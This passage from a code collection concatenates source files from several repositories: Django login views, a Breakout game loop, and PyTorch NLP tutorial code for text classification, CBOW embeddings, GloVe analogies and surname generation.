from django.contrib.auth import login as auth_login
from django.contrib.auth import logout as auth_logout
from .forms import LoginForm
from feeds.models import Meta
def index(request):
if request.user.is_authenticated:
return render(request,'layout.html', {'updated': Meta.load().updated})
else:
return HttpResponseRedirect('/login/')
def login(request):
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
values = form.cleaned_data
user = auth_authenticate(username=values['username'], password=values['password'])
if user is not None:
if user.is_active:
auth_login(request, user)
return HttpResponseRedirect('/')
else:
form = LoginForm()
return render(request,'layout.html',{'form': form, 'login': True})
def logout(request):
auth_logout(request)
return HttpResponseRedirect('/login/')
``` |
{
"source": "jochenklar/verlustdernacht",
"score": 3
} |
#### File: management/commands/create-nights.py
```python
from datetime import datetime, timedelta
from django.core.management.base import BaseCommand
from api.utils import create_night
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('location', action='store', help='Location for this night')
parser.add_argument('start', action='store', default=False, help='Start date')
parser.add_argument('end', action='store', default=False, help='End date')
def handle(self, *args, **options):
start_date = datetime.strptime(options['start'], '%Y-%m-%d')
end_date = datetime.strptime(options['end'], '%Y-%m-%d')
date = start_date
while date <= end_date:
print(date.strftime('%Y-%m-%d'))
create_night(options['location'], date.strftime('%Y-%m-%d'))
date += timedelta(1)
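# Illustrative invocation (assumption): create one night per day for a location over an
# inclusive date range (dates in YYYY-MM-DD), e.g.
#
#   python manage.py create-nights lapalma 2020-01-01 2020-01-31
#
# 'lapalma' is a placeholder location name.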
``` |
{
"source": "JochenMa/stancode_projects",
"score": 3
} |
#### File: stancode_projects/breakout_game/breakout.py
```python
from campy.gui.events.timer import pause
from breakoutgraphics import BreakoutGraphics
FRAME_RATE = 1000 / 120 # 120 frames per second
def main():
graphics = BreakoutGraphics()
# Add animation loop here!
while True:
graphics.collision() # detect collision
graphics.ball_move() # move the ball
pause(FRAME_RATE)
graphics.win_or_lose() # detect win or lose
if graphics.end_game(): # when the game is ended, break the loop
break
if graphics.win:
# For bonus game
graphics.bonus()
while True:
graphics.collision()
graphics.ball_move()
graphics.move_drop()
pause(FRAME_RATE)
if graphics.bonus_end():
break
pause(FRAME_RATE*200) # animation for showing final score board
graphics.final_score_board() # final score board
if __name__ == '__main__':
main()
``` |
{
"source": "Jochen-M/pytorch_nlp",
"score": 2
} |
#### File: examples/commons/helper.py
```python
import os
import re
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
def describe(x: torch.Tensor):
print(f"Type: {x.type()}")
print(f"Shape/size: {x.shape}")
print(f"Values: \n{x}")
def preprocess_text(text):
text = text.lower()
text = re.sub(r"([.,!?])", r" \1 ", text)
text = re.sub(r"[^a-zA-Z.,!?]+", r" ", text)
return text
def make_train_state(args):
return {"stop_early": False,
"early_stopping_step": 0,
"early_stopping_best_val": 1e8,
"learning_rate": args.learning_rate,
"epoch_index": 0,
"train_loss": [],
"train_acc": [],
"val_loss": [],
"val_acc": [],
"test_loss": -1,
"test_acc": -1,
"model_filename": args.model_state_file}
def update_train_state(args, model, train_state):
""" Handle the training state updates.
Components:
- Early Stopping: Prevent overfitting.
- Model Checkpoint: Model is saved if the model is better
:param args: main arguments
:param model: model to train
:param train_state: a dictionary representing the training state values
:returns: a new train_state
"""
# Save one model at least
if train_state["epoch_index"] == 0:
torch.save(model.state_dict(), train_state["model_filename"])
train_state["stop_early"] = False
# Save model if performance improved
elif train_state["epoch_index"] >= 1:
loss_tm1, loss_t = train_state["val_loss"][-2:]
# If loss worsened
if loss_t >= train_state["early_stopping_best_val"]:
# Update step
train_state["early_stopping_step"] += 1
# Loss decreased
else:
# Save the best model
if loss_t < train_state["early_stopping_best_val"]:
torch.save(model.state_dict(), train_state["model_filename"])
            # Reset early stopping step
train_state["early_stopping_step"] = 0
# Update early_stopping_best_val
train_state["early_stopping_best_val"] = loss_t
# Stop early ?
train_state["stop_early"] = \
train_state["early_stopping_step"] >= args.early_stopping_criteria
return train_state
def compute_accuracy(y_pred, y_target):
if y_pred.shape[1] == 1:
y_pred_indices = (torch.sigmoid(y_pred) > 0.5).long()
else:
_, y_pred_indices = y_pred.max(dim=1)
n_correct = torch.eq(y_pred_indices, y_target).sum().item()
return n_correct / len(y_pred_indices) * 100
def set_seed_everywhere(seed, cuda):
np.random.seed(seed)
torch.manual_seed(seed)
if cuda:
torch.cuda.manual_seed_all(seed)
def handle_dirs(dirpath):
if not os.path.exists(dirpath):
os.makedirs(dirpath)
def load_glove_from_file(glove_filepath):
""" Load the GloVe embeddings
:param glove_filepath: path to the glove embeddings file
:return: word_to_index (dict), embeddings (numpy.ndarary)
"""
word_to_index = {}
embeddings = []
with open(glove_filepath, "r", encoding="utf8") as fp:
for index, line in enumerate(fp):
line = line.split(" ")
word_to_index[line[0]] = index
embeddings_i = np.array([float(val) for val in line[1:]])
embeddings.append(embeddings_i)
return word_to_index, np.stack(embeddings)
def make_embedding_matrix(glove_filepath, words):
""" Create embedding matrix for a specific set of words.
    :param glove_filepath: file path to the glove embeddings
:param words (list): list of words in the dataset
"""
word_to_idx, glove_embeddings = load_glove_from_file(glove_filepath)
embedding_size = glove_embeddings.shape[1]
final_embeddings = np.zeros((len(words), embedding_size))
for i, word in enumerate(words):
if word in word_to_idx:
final_embeddings[i, :] = glove_embeddings[word_to_idx[word]]
else:
embedding_i = torch.ones(1, embedding_size)
nn.init.xavier_uniform_(embedding_i)
final_embeddings[i, :] = embedding_i
return final_embeddings
def generate_batches(dataset, batch_size, shuffle=True, drop_last=True, device="cpu"):
""" A generator function which wraps the PyTorch DataLoader.
    It will ensure each tensor is on the right device location.
"""
dataloader = DataLoader(dataset=dataset, batch_size=batch_size,
shuffle=shuffle, drop_last=drop_last)
for data_dict in dataloader:
out_data_dict = {}
for name, tensor in data_dict.items():
out_data_dict[name] = data_dict[name].to(device)
yield out_data_dict
def normalize_sizes(y_pred, y_true):
""" Normalize tensor sizes
:param y_pred: (torch.Tensor) the output of the model
If a 3-dimensional tensor, reshapes to a matrix
:param y_true: (torch.Tensor) the target predictions
If a matrix, reshapes to be a vector
"""
if len(y_pred.size()) == 3:
y_pred = y_pred.contiguous().view(-1, y_pred.size(2))
if len(y_true.size()) == 2:
y_true = y_true.contiguous().view(-1)
return y_pred, y_true
def sequence_loss(y_pred, y_true, mask_index):
y_pred, y_true = normalize_sizes(y_pred, y_true)
return F.cross_entropy(y_pred, y_true, ignore_index=mask_index)
def compute_accuracy(y_pred, y_true, mask_index):
y_pred, y_true = normalize_sizes(y_pred, y_true)
_, y_pred_indices = y_pred.max(dim=1)
correct_indices = torch.eq(y_pred_indices, y_true).float()
valid_indices = torch.ne(y_true, mask_index).float()
n_correct = (correct_indices * valid_indices).sum().item()
n_valid = valid_indices.sum().item()
return n_correct / n_valid * 100
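# Illustrative sketch (assumption, not part of the original module): using
# generate_batches() inside a training loop.
#
#   for batch_dict in generate_batches(dataset, batch_size=32, device="cpu"):
#       y_pred = model(batch_dict["x_data"])                       # keys depend on the dataset
#       loss = sequence_loss(y_pred, batch_dict["y_target"], mask_index)
#
# `dataset`, `model`, the dictionary keys and `mask_index` are placeholders for values
# defined by the calling example.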
```
#### File: examples/continuous_bag_of_words_embeddings/munging_frankenstein.py
```python
import nltk.data
import pandas as pd
from tqdm import tqdm_notebook
from argparse import Namespace
from examples.commons.helper import preprocess_text
args = Namespace(
raw_dataset_txt="../../data/books/frankenstein.txt",
window_size=5,
mask_token="<MASK>",
train_proportion=0.7,
val_proportion=0.15,
test_proportion=0.15,
output_munged_csv="../../data/books/output_munged.csv",
seed=7676
)
# Split the raw text book into sentences
tokenizer = nltk.data.load("tokenizers/punkt/english.pickle")
with open(args.raw_dataset_txt) as fp:
book = fp.read()
sentences = tokenizer.tokenize(book)
print(len(sentences), "sentences")
print("Sample:", sentences[100])
cleaned_sentences = [preprocess_text(sentence)
for sentence in sentences]
# Create windows
flatten = lambda outer_list: [item
for inner_list in outer_list
for item in inner_list]
windows = flatten([list(nltk.ngrams([args.mask_token] * args.window_size +
sentence.split(" ") +
[args.mask_token] * args.window_size,
args.window_size * 2 + 1))
for sentence in tqdm_notebook(cleaned_sentences)])
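# Illustrative sketch (assumption, shown with window_size=2 for brevity): the sentence
# "the monster spoke" is padded to
#   <MASK> <MASK> the monster spoke <MASK> <MASK>
# and yields 5-gram windows such as ('<MASK>', '<MASK>', 'the', 'monster', 'spoke'),
# whose centre token becomes the CBOW target and whose non-mask neighbours form the context.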
# Create cbow data
data = []
for window in tqdm_notebook(windows):
target_token = window[args.window_size]
context = []
for i, token in enumerate(window):
if token == args.mask_token or i == args.window_size:
continue
else:
context.append(token)
data.append([" ".join(token for token in context), target_token])
# Convert to dataframe
cbow_data = pd.DataFrame(data, columns=["context", "target"])
# Create split data
n = len(cbow_data)
def get_split(row_num):
if row_num <= n*args.train_proportion:
return "train"
elif n*args.train_proportion < row_num <= n*args.train_proportion + n*args.val_proportion:
return "val"
else:
return "test"
cbow_data["split"] = cbow_data.apply(lambda row: get_split(row.name), axis=1)
print(cbow_data.head())
# Write split data to file
cbow_data.to_csv(args.output_munged_csv, index=False)
```
#### File: examples/continuous_bag_of_words_embeddings/vocabulary.py
```python
class Vocabulary(object):
""" Class to process text and extract Vocabulary for mapping"""
def __init__(self, token_to_idx=None, mask_token="<MASK>", add_unk=True, unk_token="<UNK>"):
"""
:param token_to_idx (dict): a preexisting map of tokens to indices
:param add_unk (bool): a flag that indicates whether to add the UNK token
:param unk_token (str): the UNK token to add into the Vocabulary
"""
if token_to_idx is None:
token_to_idx = {}
self._token_to_idx = token_to_idx
self._idx_to_token = {idx: token
for token, idx in self._token_to_idx.items()}
self._mask_token = mask_token
self.mask_index = self.add_token(self._mask_token)
self._add_unk = add_unk
self._unk_token = unk_token
self.unk_index = -1
if add_unk:
self.unk_index = self.add_token(unk_token)
def to_serializable(self):
""" Returns a dictionary that can be serialized """
return {"token_to_idx": self._token_to_idx,
"add_unk": self._add_unk,
"unk_token": self._unk_token}
@classmethod
def from_serializable(cls, contents):
""" Instantiates the Vocabulary from a serialized dictionary """
return cls(**contents)
def add_token(self, token):
""" Update mapping dicts based on the token.
:param token (str): the item to add into the Vocabulary
:return index (int): the integer corresponding to the token
"""
if token in self._token_to_idx:
index = self._token_to_idx[token]
else:
index = len(self._token_to_idx)
self._token_to_idx[token] = index
self._idx_to_token[index] = token
return index
def add_many(self, tokens):
""" Add a list of tokens into the Vocabulary
:param tokens (list): a list of string tokens
:return indices (list): a list of indices corresponding to the tokens
"""
return [self.add_token(token) for token in tokens]
def lookup_token(self, token):
""" Retrieve the index associated with the token
or the UNK index if token isn't present.
:param token (str): the token to look up
:return index (int): the index corresponding to the token
Notes: `unk_index` needs to be >=0 (having been added into the Vocabulary)
for the UNK functionality
"""
if self.unk_index >= 0:
return self._token_to_idx.get(token, self.unk_index)
else:
return self._token_to_idx[token]
def lookup_index(self, index):
"""Return the token associated with the index
:param index (int): the index to look up
:return token (str): the token corresponding to the index
Raises: KeyError: if the index is not in the Vocabulary
"""
if index not in self._idx_to_token:
raise KeyError("The index (%d) is not in the Vocabulary" % index)
return self._idx_to_token[index]
def __str__(self):
return "<Vocabulary(size=%d)>" % len(self)
def __len__(self):
return len(self._token_to_idx)
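# Illustrative usage sketch (assumption, not part of the original module):
#
#   vocab = Vocabulary()
#   idx = vocab.add_token("frankenstein")
#   vocab.lookup_token("frankenstein") == idx               # True
#   vocab.lookup_token("unseen-word") == vocab.unk_index    # unknown words map to <UNK>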
```
#### File: examples/doc_classification_with_pretrained_embeddings/cnn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNN(nn.Module):
def __init__(self, embedding_size, num_embeddings, num_channels,
hidden_dim, num_classes, dropout_p,
pretrained_embeddings=None, padding_idx=0):
super(CNN, self).__init__()
if pretrained_embeddings is None:
self.emb = nn.Embedding(embedding_dim=embedding_size,
num_embeddings=num_embeddings,
padding_idx=padding_idx)
else:
pretrained_embeddings = torch.from_numpy(pretrained_embeddings).float()
self.emb = nn.Embedding(embedding_dim=embedding_size,
num_embeddings=num_embeddings,
padding_idx=padding_idx,
_weight=pretrained_embeddings)
self.convnet = nn.Sequential(
nn.Conv1d(in_channels=embedding_size,
out_channels=num_channels,
kernel_size=3),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3,
stride=2),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3,
stride=2),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3),
nn.ELU()
)
self._dropout_p = dropout_p
self.fc1 = nn.Linear(num_channels, hidden_dim)
self.fc2 = nn.Linear(hidden_dim, num_classes)
def forward(self, x_in, apply_softmax=False):
# embed and permute so features are channels
x_embedded = self.emb(x_in).permute(0, 2, 1)
features = self.convnet(x_embedded)
# average and remove the extra dimension
remaining_size = features.size(dim=2)
features = F.avg_pool1d(features, remaining_size).squeeze(dim=2)
features = F.dropout(features, p=self._dropout_p)
# final linear layer to produce classification outputs
intermediate_vector = F.relu(F.dropout(self.fc1(features),
p=self._dropout_p))
prediction_vector = self.fc2(intermediate_vector)
if apply_softmax:
prediction_vector = F.softmax(prediction_vector, dim=1)
return prediction_vector
```
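A shape-trace sketch (illustrative only; the hyperparameters and batch dimensions below are made up, not the values used in the accompanying training script) showing what the convolutional stack above does to a batch of token indices:
```python
# Illustrative sketch: tracing tensor shapes through the CNN defined above.
import torch

model = CNN(embedding_size=100, num_embeddings=5000, num_channels=64,
            hidden_dim=32, num_classes=4, dropout_p=0.1)
x = torch.randint(0, 5000, (8, 30))    # batch of 8 sequences, 30 token indices each
logits = model(x)                      # raw scores, shape (8, 4)
probs = model(x, apply_softmax=True)   # softmax rows, each summing to 1
print(logits.shape, probs.sum(dim=1))
```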
#### File: examples/doc_classification_with_pretrained_embeddings/pretrained_embeddings.py
```python
import numpy as np
from annoy import AnnoyIndex
class PreTrainedEmbeddings(object):
def __init__(self, word_to_index, word_vectors):
"""
:param word_to_index (dict): mapping from word to integers
:param word_vectors (list of numpy arrays)
"""
self.word_to_index = word_to_index
self.word_vectors = word_vectors
self.index_to_word = \
{v: k for k, v in self.word_to_index.items()}
self.index = AnnoyIndex(len(word_vectors[0]),
metric="euclidean")
for _, i in self.word_to_index.items():
self.index.add_item(i, self.word_vectors[i])
self.index.build(50)
@classmethod
def from_embeddings_file(cls, embedding_file="../data/glove/glove.100d.txt"):
""" Instantiate from pre-trained vector file.
Vector file should be of the format:
word0 x0_0 x0_1 x0_2 x0_3 ... x0_N
word1 x1_0 x1_1 x1_2 x1_3 ... x1_N
:param embedding_file: location of the file
:return instance of PreTrainedEmbeddings
"""
word_to_index = {}
word_vectors = []
with open(embedding_file, encoding="utf8") as fp:
for line in fp.readlines():
line = line.split(" ")
word = line[0]
vec = np.array([float(x) for x in line[1:]])
word_to_index[word] = len(word_to_index)
word_vectors.append(vec)
return cls(word_to_index, word_vectors)
def get_embedding(self, word):
"""
:param word: str
:return: an embedding (numpy.ndarray)
"""
return self.word_vectors[self.word_to_index[word]]
def get_closest_to_vector(self, vector, n=1):
""" Given a vector, return its n nearest neighbors
:param vector: (np.ndarray) should match the size of the vectors in the Annoy index
:param n: (int) the number of neighbors to return
:return [str, str, ...]: words nearest to the given vector. The words are not ordered by distance.
"""
nn_indices = self.index.get_nns_by_vector(vector, n)
return [self.index_to_word[neighbor]
for neighbor in nn_indices]
def compute_and_print_analogy(self, word1, word2, word3):
vec1 = self.get_embedding(word1)
vec2 = self.get_embedding(word2)
vec3 = self.get_embedding(word3)
# Simple hypothesis: Analogy is a spatial relationship
spatial_relationship = vec2 - vec1
vec4 = vec3 + spatial_relationship
closest_words = self.get_closest_to_vector(vec4, n=4)
existing_words = set([word1, word2, word3])
closest_words = [word for word in closest_words
if word not in existing_words]
if len(closest_words) == 0:
print("Could not find nearest neighbors for the vector!")
return
for word4 in closest_words:
print("{} : {} :: {} : {}".format(word1, word2, word3, word4))
if __name__ == "__main__":
embeddings = PreTrainedEmbeddings.from_embeddings_file("../data/glove/glove.100d.txt")
# Relationship 1: the relationship between gendered nouns and pronoun
embeddings.compute_and_print_analogy("man", "he", "woman")
# Relationship 2: Verb-noun relationships
embeddings.compute_and_print_analogy("fly", "plane", "sail")
# Relationship 3: Noun-noun relationships
embeddings.compute_and_print_analogy("cat", "kitten", "dog")
# Relationship 4: Hypernymy (broader category)
embeddings.compute_and_print_analogy('blue', 'color', 'dog')
# Relationship 5: Meronymy (part-to-whole)
embeddings.compute_and_print_analogy('toe', 'foot', 'finger')
# Relationship 6: Troponymy (difference in manner)
embeddings.compute_and_print_analogy('talk', 'communicate', 'read')
# Relationship 7: Metonymy (convention / figures of speech)
embeddings.compute_and_print_analogy('blue', 'democrat', 'red')
# Relationship 8: Adjectival scales
embeddings.compute_and_print_analogy('fast', 'fastest', 'young')
# An example illustrating the danger of using co-occurrences to encode meaning: sometimes they do not!
embeddings.compute_and_print_analogy('fast', 'fastest', 'small')
# Watch out for protected attributes such as gender encoded in word embeddings.
# This can introduce unwanted biases in downstream models.
embeddings.compute_and_print_analogy("man", "king", "woman")
# Cultural gender bias encoded in vector analogy
embeddings.compute_and_print_analogy("man", "doctor", "woman")
```
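A manual version of the analogy arithmetic used by `compute_and_print_analogy` (illustrative only; it assumes the same local GloVe file referenced in the `__main__` block above is available):
```python
# Illustrative sketch: the word-analogy offset trick done by hand with the class above.
embeddings = PreTrainedEmbeddings.from_embeddings_file("../data/glove/glove.100d.txt")

# "man is to he as woman is to ?": translate "woman" by the (he - man) offset ...
offset = embeddings.get_embedding("he") - embeddings.get_embedding("man")
query = embeddings.get_embedding("woman") + offset

# ... and look the result up in the Annoy index built in __init__.
print(embeddings.get_closest_to_vector(query, n=5))   # typically includes "she"
```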
#### File: examples/doc_classification_with_pretrained_embeddings/train.py
```python
import sys
sys.path.append("../../")
import os
import torch
from tqdm import tqdm_notebook
from torch import nn
from torch import optim
from argparse import Namespace
from examples.commons import helper
from examples.doc_classification_with_pretrained_embeddings.cnn import CNN
from examples.doc_classification_with_pretrained_embeddings.news_dataset import NewsDataset
args = Namespace(
news_csv="../../data/ag_news/output_munged.csv",
vectorizer_file="vectorizer.json",
model_state_file="model.pth",
save_dir="../../model_storage/doc_classification",
glove_filepath="../../data/glove/glove.6B.300d.txt",
use_glove=True,
embedding_size=300,
hidden_dim=100,
num_channels=100,
seed=7676,
learning_rate=1e-3,
dropout_p=0.1,
batch_size=128,
num_epochs=100,
early_stopping_criteria=5,
cuda=True,
catch_keyboard_interrupt=True,
reload_from_files=False,
expand_filepaths_to_save_dir=True
)
def predict_category(title, classifier, vectorizer, max_length):
title = helper.preprocess_text(title)
vectorized_title = torch.tensor(vectorizer.vectorize(title, vector_length=max_length))
result = classifier(vectorized_title.unsqueeze(0), apply_softmax=True)
probability_values, indices = result.max(dim=1)
predicted_category = vectorizer.category_vocab.lookup_index(indices.item())
return {"category": predicted_category,
"probability": probability_values.item()}
def get_samples(k=5):
samples = {}
for cat in dataset.val_df.category.unique():
samples[cat] = dataset.val_df.title[dataset.val_df.category == cat].tolist()[:k]
return samples
# Prep work
if args.expand_filepaths_to_save_dir:
args.vectorizer_file = os.path.join(args.save_dir, args.vectorizer_file)
args.model_state_file = os.path.join(args.save_dir, args.model_state_file)
print("Expanded filepaths:")
print("\t{}".format(args.vectorizer_file))
print("\t{}".format(args.model_state_file))
# Check CUDA
if not torch.cuda.is_available():
args.cuda = False
args.device = torch.device("cuda" if args.cuda else "cpu")
print("Using CUDA: {}".format(args.cuda))
# Set seed for reproducibility
helper.set_seed_everywhere(args.seed, args.cuda)
# handle dirs
helper.handle_dirs(args.save_dir)
# Initializations
if args.reload_from_files:
# training from a checkpoint
print("Loading dataset and vectorizer")
dataset = NewsDataset.load_dataset_and_load_vectorizer(
args.news_csv, args.vectorizer_file)
else:
print("Loading dataset and creating vectorizer")
# create dataset and vectorizer
dataset = NewsDataset.load_dataset_and_make_vectorizer(args.news_csv)
dataset.save_vectorizer(args.vectorizer_file)
vectorizer = dataset.get_vectorizer()
# Use GloVe or randomly initialized embeddings
if args.use_glove:
words = vectorizer.title_vocab._token_to_idx.keys()
embeddings = helper.make_embedding_matrix(glove_filepath=args.glove_filepath,
words=words)
print("Using pre-trained embeddings")
else:
embeddings = None
print("Not using pre-trained embeddings")
classifier = CNN(embedding_size=args.embedding_size,
num_embeddings=len(vectorizer.title_vocab),
num_channels=args.num_channels,
hidden_dim=args.hidden_dim,
num_classes=len(vectorizer.category_vocab),
dropout_p=args.dropout_p,
pretrained_embeddings=embeddings,
padding_idx=0)
classifier = classifier.to(args.device)
dataset.class_weights = dataset.class_weights.to(args.device)
# loss and optimizer
loss_func = nn.CrossEntropyLoss()
optimizer = optim.Adam(classifier.parameters(), lr=args.learning_rate)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer,
mode="min",
factor=0.5,
patience=1)
# Training loop
train_state = helper.make_train_state(args)
epoch_bar = tqdm_notebook(desc="training routine",
total=args.num_epochs,
position=0)
dataset.set_split("train")
train_bar = tqdm_notebook(desc="split=train",
total=dataset.get_num_batches(args.batch_size),
position=1,
leave=True)
dataset.set_split("val")
val_bar = tqdm_notebook(desc="split=val",
total=dataset.get_num_batches(args.batch_size),
position=1,
leave=True)
try:
for epoch_index in range(args.num_epochs):
train_state["epoch_index"] = epoch_index
dataset.set_split("train")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.
running_acc = 0.
classifier.train()
for batch_index, batch_dict in enumerate(batch_generator):
optimizer.zero_grad()
y_pred = classifier(batch_dict["x_data"])
loss = loss_func(y_pred, batch_dict["y_target"])
loss_t = loss.item()
running_loss += (loss_t - running_loss) / (batch_index + 1)
loss.backward()
optimizer.step()
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"])
running_acc += (acc_t - running_acc) / (batch_index + 1)
train_bar.set_postfix(loss=running_loss,
acc=running_acc,
epoch=epoch_index)
train_bar.update()
train_state["train_loss"].append(running_loss)
train_state["train_acc"].append(running_acc)
dataset.set_split("val")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.
running_acc = 0.
classifier.eval()
for batch_index, batch_dict in enumerate(batch_generator):
y_pred = classifier(batch_dict["x_data"])
loss = loss_func(y_pred, batch_dict["y_target"])
loss_t = loss.item()
running_loss += (loss_t - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"])
running_acc += (acc_t - running_acc) / (batch_index + 1)
val_bar.set_postfix(loss=running_loss,
acc=running_acc,
epoch=epoch_index)
val_bar.update()
train_state["val_loss"].append(running_loss)
train_state["val_acc"].append(running_acc)
train_state = helper.update_train_state(args=args,
model=classifier,
train_state=train_state)
scheduler.step(train_state["val_loss"][-1])
# if train_state["stop_early"]:
# break
train_bar.n = 0
val_bar.n = 0
epoch_bar.update()
print(f"Epoch {epoch_index}")
except KeyboardInterrupt:
print("Exiting loop")
classifier.load_state_dict(torch.load(train_state["model_filename"]))
classifier = classifier.to(args.device)
dataset.class_weights = dataset.class_weights.to(args.device)
loss_func = nn.CrossEntropyLoss(dataset.class_weights)
dataset.set_split("test")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.
running_acc = 0.
classifier.eval()
for batch_index, batch_dict in enumerate(batch_generator):
y_pred = classifier(batch_dict["x_data"])
loss = loss_func(y_pred, batch_dict["y_target"])
loss_t = loss.item()
running_loss += (loss_t - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"])
running_acc += (acc_t - running_acc) / (batch_index + 1)
train_state["test_loss"] = running_loss
train_state["test_acc"] = running_acc
print(f"Test loss: {train_state['test_loss']}")
print(f"Test acc: {train_state['test_acc']}")
classifier = classifier.to("cpu")
val_samples = get_samples()
for truth, sample_group in val_samples.items():
print(f"True Category: {truth}")
print("=" * 30)
for sample in sample_group:
prediction = predict_category(sample,
classifier,
vectorizer,
dataset._max_seq_length + 1)
print("Prediction: {} (p={:.2f})".format(prediction["category"],
prediction["probability"]))
print("\t + Sample: {}".format(sample))
print("-" * 30)
```
#### File: examples/review_sentiment_classification_with_perceptron/perceptron.py
```python
import torch
import torch.nn as nn
class Perceptron(nn.Module):
""" A simple perceptronbased classifier """
def __init__(self, num_features):
"""
:param num_features (int): the size of the input feature vector
"""
super(Perceptron, self).__init__()
self.fc1 = nn.Linear(in_features=num_features, out_features=1)
def forward(self, x_in, apply_sigmoid=False):
"""The forward pass of the classifier
:param x_in (torch.Tensor): an input data tensor.
x_in.shape should be (batch, num_features)
:param apply_sigmoid (bool): a flag for the sigmoid activation
should be False if used with the cross-entropy losses
:return the resulting tensor. tensor.shape should be (batch,)
"""
y_out = self.fc1(x_in).squeeze()
if apply_sigmoid:
y_out = torch.sigmoid(y_out)
return y_out
```
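A toy training sketch (illustrative only; the data and hyperparameters are made up) showing why `apply_sigmoid` stays `False` during training: `nn.BCEWithLogitsLoss` applies the sigmoid internally for numerical stability, and probabilities are only needed at inference time.
```python
# Illustrative sketch: training the Perceptron above on toy binary data.
import torch
import torch.nn as nn

model = Perceptron(num_features=4)
loss_fn = nn.BCEWithLogitsLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)

x = torch.randn(64, 4)                 # 64 samples, 4 features each
y = (x.sum(dim=1) > 0).float()         # toy labels: positive if features sum above zero

for _ in range(20):
    optimizer.zero_grad()
    logits = model(x)                  # raw scores, shape (64,)
    loss = loss_fn(logits, y)
    loss.backward()
    optimizer.step()

probs = model(x, apply_sigmoid=True)   # probabilities for inspection / inference
print(loss.item(), probs[:3])
```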
#### File: examples/surname_classification_with_cnn/cnn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNN(nn.Module):
def __init__(self, initial_num_channels, num_classes, num_channels):
super(CNN, self).__init__()
self.convnet = nn.Sequential(
nn.Conv1d(in_channels=initial_num_channels,
out_channels=num_channels,
kernel_size=3),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3,
stride=2),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3,
stride=2),
nn.ELU(),
nn.Conv1d(in_channels=num_channels,
out_channels=num_channels,
kernel_size=3),
nn.ELU()
)
self.fc = nn.Linear(num_channels, num_classes)
def forward(self, x_surname, apply_softmax=False):
features = self.convnet(x_surname).squeeze(dim=2)
prediction_vector = self.fc(features)
if apply_softmax:
prediction_vector = F.softmax(prediction_vector, dim=1)
return prediction_vector
if __name__ == "__main__":
batch_size = 2
one_hot_size = 10
sequence_width = 7
data = torch.randn(batch_size, one_hot_size, sequence_width)
conv1 = nn.Conv1d(in_channels=one_hot_size, out_channels=16, kernel_size=3)
conv1_bn = nn.BatchNorm1d(num_features=16)
conv2 = nn.Conv1d(in_channels=16, out_channels=32, kernel_size=3)
conv3 = nn.Conv1d(in_channels=32, out_channels=64, kernel_size=3)
intermediate1 = conv1(data)
intermediate1_bn = conv1_bn(intermediate1)
intermediate2 = conv2(intermediate1)
intermediate3 = conv3(intermediate2)
print(data.size())
print(intermediate1.size())
print(intermediate1_bn.size())
print(intermediate2.size())
print(intermediate3.size())
print(intermediate1)
print(intermediate1_bn)
# print(intermediate1.view(batch_size, -1).size())
# print(torch.mean(intermediate1, dim=2).size())
# print(torch.max(intermediate1, dim=2))
# print(torch.sum(intermediate1, dim=2))
# cnn = CNN(85, 18, 256)
# print(cnn)
```
#### File: examples/surname_generation/train.py
```python
import sys
sys.path.append("../../")
import os
import torch
import numpy as np
import torch.nn.functional as F
from tqdm import tqdm_notebook
from torch import optim
from argparse import Namespace
from examples.commons import helper
from examples.surname_generation.surname_dataset import SurnameDataset
from examples.surname_generation.conditional_generation_model import ConditionalGenerationModel
from examples.surname_generation.unconditional_generation_model import UnconditionalGenerationModel
args = Namespace(
surname_csv="../../data/surnames/output_munged.csv",
vectorizer_file="vectorizer.json",
model_state_file="model.pth",
save_dir="../../model_storage/surnames_generation/",
char_embedding_size=64,
rnn_hidden_size=32,
num_epochs=100,
batch_size=128,
learning_rate=1e-3,
seed=7676,
early_stopping_criteria=5,
cuda=True,
catch_keyboard_interrupt=True,
reload_from_files=False,
expand_filepaths_to_save_dir=True,
conditional=True
)
def sample_from_unconditional_model(model, vectorizer, num_samples=1, sample_size=20, temperature=1.0):
""" Sample a sequence of indices from the model
:param model: (SurnameGenerationModel) the trained model
:param vectorizer: (SurnameVectorizer) the corresponding vectorizer
:param num_samples: (int) the number of samples
:param sample_size: (int) the max length of the samples
:param temperature: (float) accentuates or flattens the distribution.
0.0 < temperature < 1.0 will make it peakier.
temperature > 1.0 will make it more uniform
:return: indices (torch.Tensor): the matrix of indices;
shape = (num_samples, sample_size)
"""
begin_seq_index = [vectorizer.character_vocab.begin_seq_index for _ in range(num_samples)]
begin_seq_index = torch.tensor(begin_seq_index,
dtype=torch.int64).unsqueeze(dim=1)
indices = [begin_seq_index]
h_t = None
for time_step in range(sample_size):
x_t = indices[time_step]
x_emb_t = model.char_emb(x_t)
rnn_out_t, h_t = model.rnn(x_emb_t, h_t)
prediction_vector = model.fc(rnn_out_t.squeeze(dim=1))
probability_vector = F.softmax(prediction_vector / temperature, dim=1)
indices.append(torch.multinomial(probability_vector, num_samples=1))
indices = torch.stack(indices).squeeze().permute(1, 0)
return indices
def sample_from_conditional_model(model, vectorizer, nationalities, sample_size=20, temperature=1.0):
""" Sample a sequence of indices from the model
:param model: (SurnameGenerationModel) the trained model
:param vectorizer: (SurnameVectorizer) the corresponding vectorizer
:param nationalities: (list) a list of integers representing nationalities
